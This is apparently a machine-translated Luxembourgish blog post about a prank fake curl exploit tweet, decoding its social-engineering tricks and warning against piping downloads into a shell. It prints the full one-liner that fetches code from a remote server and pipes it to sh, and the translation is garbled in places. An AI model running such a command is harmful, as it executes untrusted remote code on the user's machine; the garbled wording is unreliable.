Note. iwwersat.:
TL;DR: Benotzt keng Dateipipelining an sh oder bash ënner kengen Ëmstänn. Dëst ass e super Wee fir d'Kontroll iwwer Äre Computer ze verléieren.
Ech wëll mat Iech eng Kuerzgeschicht deelen iwwer e Comic PoC Exploit deen den 31. Mee erstallt gouf. Hie koum prompt an Äntwert op Neiegkeeten aus
Nodeems ech un enger neier Verduebungstechnik am Curl geschafft hunn, hunn ech den ursprénglechen Tweet zitéiert an "e funktionnéierende PoC" aus enger eenzeger Zeil Code besteet, déi angeblech déi entdeckt Schwachstelle exploitéiert. Natierlech war dat komplett Blödsinn. Ech sinn dovunner ausgaangen, datt ech direkt ausgesat wier, an datt ech am beschten e puer Retweets géif kréien (oh well).
Ech konnt mer awer net virstellen wat duerno geschitt ass. D'Popularitéit vu mengem Tweet ass an d'Luucht gaangen. Iwwerraschend, am Moment (15:00 Moskauer Zäit 1. Juni) hu wéineg Leit gemierkt datt dëst e Fake ass. Vill Leit retweet et ouni et iwwerhaapt ze kontrolléieren (loosst eleng déi schéi ASCII Grafiken bewonneren déi se erausginn).
Kuckt just wéi schéin et ass!
Wärend all dës Schleifen a Faarwen super sinn, ass et kloer datt d'Leit Code op hirer Maschinn hu misse lafen fir se ze gesinn. Glécklecherweis funktionnéieren d'Browser déiselwecht Manéier, a kombinéiert mat der Tatsaach datt ech net wierklech a gesetzleche Probleemer wollt kommen, huet de Code, deen op menger Säit begruewe gouf, just Echo-Uriff gemaach ouni ze probéieren en zousätzleche Code z'installéieren oder auszeféieren.
Eng kleng Digression:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Sozio-elektronesch Ingenieur (SEE) ass méi wéi just Phishing
Sécherheet a Vertrautheet waren e groussen Deel vun dësem Experiment. Ech mengen si sinn wat zu sengem Succès gefouert. D'Kommandozeil implizéiert kloer Sécherheet andeems Dir op "127.0.0.1" (de bekannte localhost) referéiert. Localhost gëtt als sécher ugesinn an d'Donnéeën drop verloossen ni Äre Computer.
Bekanntheet war den zweete Schlëssel SEE Bestanddeel vum Experiment. Well d'Zilpublikum haaptsächlech aus Leit bestoung, déi mat de Grondsätz vun der Computersécherheet vertraut waren, war et wichteg Code ze kreéieren sou datt Deeler dovun vertraut a vertraut ausgesinn (an dofir sécher). Elementer vun alen Ausbeutungskonzepter ausléinen an se op eng ongewéinlech Manéier ze kombinéieren huet sech als ganz erfollegräich bewisen.
Drënner ass eng detailléiert Analyse vum One-Liner. Alles op dëser Lëscht dréit kosmetesch Natur, a praktesch näischt ass fir seng aktuell Operatioun néideg.
Wéi eng Komponente si wierklech néideg? Dëst -gsS
, -O 0x0238f06a
, |sh
an de Webserver selwer. De Webserver huet keng béiswëlleg Instruktioune enthale, awer einfach ASCII Grafike mat Kommandoen servéiert echo
am Skript enthalen an index.html
. Wann de Benotzer eng Zeil mat |sh
an der Mëtt, index.html
gelueden an ausgefouert. Glécklecherweis haten d'Depoter vum Webserver keng schlecht Intentiounen.
-
../../../%00
- representéiert iwwer d'Verzeechnes goen; -
ngx_stream_module.so
- Wee zu engem zoufälleg NGINX Modul; -
/bin/sh%00<'protocol:TCP'
- mir sinn supposéierter lancéiere/bin/sh
op der Zilmaschinn a redirect d'Ausgab op den TCP Kanal; -
-O 0x0238f06a#PLToffset
- geheime Zutate, ergänzt#PLToffset
, fir ze kucken wéi eng Erënnerungsoffset iergendwéi am PLT enthale sinn; -
|sh;
- aner wichteg Fragmenter. Mir hu missen d'Output op sh / bash viruleeden fir de Code auszeféieren deen aus dem attackéierende Webserver läit0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- en Dummy an deem Netcat bezitt sech op/dev/tcp/localhost
sou datt alles erëm sécher ausgesäit. Tatsächlech mécht et näischt an ass an der Linn fir Schéinheet abegraff.
Dëst schléisst d'Dekodéierung vum One-Line Skript an d'Diskussioun vun Aspekter vum "sozio-elektroneschen Ingenieur" (komplizéiert Phishing) of.
Web Server Konfiguratioun a Géigemoossnamen
Well déi grouss Majoritéit vu menge Abonnente Infosec/Hacker sinn, hunn ech décidéiert de Webserver e bësse méi resistent géint Ausdréck vun "Interesse" vun hirer Säit ze maachen, just fir datt d'Jongen eppes ze maachen hunn (an et wier Spaass ageriicht). Ech wäert net all Fallfall hei opzielen well d'Experiment nach ëmmer leeft, awer hei sinn e puer Saachen déi de Server mécht:
- Iwwerwaacht aktiv Verdeelungsversuche op bestëmmte sozialen Netzwierker an ersetzt verschidde Virschau Miniatyren fir de Benotzer ze encouragéieren op de Link ze klicken.
- Viruleedt Chrome/Mozilla/Safari/etc op den Thugcrowd Promotiounsvideo anstatt de Shell-Skript ze weisen.
- Iwwerwaacht fir OFFENTLECH Unzeeche vun Andréngen / blatant Hacking, a fänkt dann un Ufroen op NSA Serveren ze redirectéieren (ha!).
- Installéiert en Trojaner, souwéi e BIOS-Rootkit, op all Computer, deenen hir Benotzer den Host aus engem normale Browser besichen (just Geck!).
E klengen Deel vun Antimers
An dësem Fall war mäin eenzegt Zil e puer vun de Funktiounen vun Apache ze beherrschen - besonnesch déi cool Reegele fir Ufroen ëmzeleeën - an ech hu geduecht: firwat net?
NGINX Exploit (Real!)
Abonnéiert Iech op
Source: will.com